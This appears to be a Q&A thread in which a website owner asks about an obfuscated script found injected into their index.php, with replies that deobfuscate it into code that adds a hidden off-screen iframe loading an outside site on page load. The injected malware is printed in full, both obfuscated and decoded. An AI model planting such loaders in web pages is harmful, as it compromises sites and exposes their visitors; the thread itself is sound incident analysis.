# What does this script mean?

Tags: javascript

```
<script>
try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";
 f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92
 ,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29
,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,
95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,
105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,1
06,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103
,48,36,38,99,94,90,94,86,92,98,98,88,112,106,105,36,99,92,106,36,111,99,97,37,102,93,103,24,48
,4,0,94,93,104,98,37,95,89,23,51,21,30,92,103,100,63,89,30,49,2,1,90,100,90,107,98,92,100,105,
37,88,100,91,111,35,88,102,101,92,100,89,58,94,94,99,90,29,96,92,103,100,31,48,4,0,114,50,3,-1
,110,95,99,91,101,108,37,101,99,99,101,86,91,22,50,23,92,103,100,55,89,91,49,2,1];
v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;286-5+5-
i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}if(x&&f&&012===10)e(s);
</script>
```

I dont know what this script does but yesterday I found this on my web `index.php` page, which is actually making the site not to display.

Is it something dangerous, like someone hacked my site or something?

Let me know if any one got any idea about this.

---

EDIT: Added by [Rob W](https://stackoverflow.com/users/938089/rob-w) (**not** the original poster): The code is obfuscated. Fix the syntax error (your formatting caused 106 to be broken into `1\n06`. Then, replace the final `e(s)`, which is a shortcut for `eval(s)` with `s`. Finally, execute the code in a console, and you will get (I did not format anything, this is the literal result):

```
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src  = "http://michaelmazur.net/xml.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
```

This script seems to be a tracker of some kind. The external page cannot read your page's cookies/etc, because of the [same origin policy's restrictions](https://developer.mozilla.org/En/Same_origin_policy_for_JavaScript). That's no guarantee that your server is safe, because it has been compromised.

Comment: Just obfuscated code. Usually, the target is some `eval` function call. Locate this function call, and replace it with `alert` or `console.log`.

Comment: "Is it something dangerous, like someone hacked my site or something?" — It is obfuscated code that you didn't put there so: Yes. Take your server offline and audit it for security vulnerabilities. Then rebuild it without those vulnerabilities.

Comment: Also for the record: i found some changes in my .htaccess file as-well Some 301 redirect was made. Now its defiantly did buy someone else but not me.

Comment: yeah, looks shady. eva + l = eval!

Comment: A quick Google search of the beginning of that script comes up with a lot of hits that have `This site may harm your computer` from Google...

Comment: Your server has been compromised. Flatten and reinstall.

Comment: @ngmiceli true even i did the same and got lot of similar obfuscated site links.

Comment: @FahidMohammad I've deobfuscated the code, and included the answer in your question.

Comment: @RobW WOW that's great. Thanks for that, now i understand what exactly happening there. Its time to shutmy site down for maintenance. Thanks for the support team :) Please don't delete this post this will be helpful for someone who face the same kind a issue.